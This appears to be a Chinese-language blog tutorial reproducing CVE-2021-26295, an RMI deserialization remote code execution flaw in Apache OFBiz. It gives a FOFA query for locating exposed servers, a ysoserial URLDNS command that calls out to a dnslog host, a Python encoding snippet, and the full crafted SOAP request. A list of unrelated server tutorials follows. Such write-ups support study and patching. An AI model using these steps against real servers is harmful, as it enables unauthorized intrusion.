Apache OFBizApache OFBiz是一个非常著名的电子商务平台,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。漏洞简介20...
Apache OFBiz
Apache OFBiz是一个非常著名的电子商务平台,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。
漏洞简介
2021年3月22日 Apache OFBiz官方发布安全更新,修复了一处由RMI反序列化造成的远程代码执行漏洞。攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。
影响版本
Apache OFBiz < 17.12.06
漏洞复现
fofa搜索关键词:
app="Apache_OFBiz"
利用ysoserial生成URLDNS利用链:
java -jar ysoserial.jar URLDNS http://***.dnslog.cn > dns.ot
公众号(黑客前沿)回复 ysoserial 获取下载链接
利用python脚本将ot文件解码:
import binascii
filename = 'dns.ot'
with open(filename, 'rb') as f:
content = f.read()
print(binascii.hexlify(content))
构造请求数据包:
POST /webtools/control/SOAPService HTTP/1.1
Host: IP:PORT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Content-Length: 1010
Accept: */*
Content-Type: application/xml
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-HashMap>
<map-Entry>
<map-Key>
<cus-obj>(ot文件解码出来的字符串)</cus-obj>
</map-Key>
<map-Value>
<std-String value="(DNSlog地址)"/>
</map-Value>
</map-Entry>
</map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>
提交后,DNSlog收到请求:
沃梦达教程
本文标题为:CVE-2021-26295 Apache OFBiz RMI 反序列化漏洞复现
猜你喜欢
- IIS搭建ftp服务器的详细教程 2022-11-15
- CentOS7安装GlusterFS集群的全过程 2022-10-10
- nginx中封禁ip和允许内网ip访问的实现示例 2022-09-23
- 阿里云ECS排查CPU数据分析 2022-10-06
- 【转载】CentOS安装Tomcat 2023-09-24
- CentOS_mini下安装docker 之 安装docker CE 2023-09-23
- KVM虚拟化Linux Bridge环境部署的方法步骤 2023-07-11
- 解决:apache24 安装后闪退和配置端口映射和连接超时设置 2023-09-11
- 利用Docker 运行 python 简单程序 2022-10-16
- 教你在docker 中搭建 PHP8 + Apache 环境的过程 2022-10-06
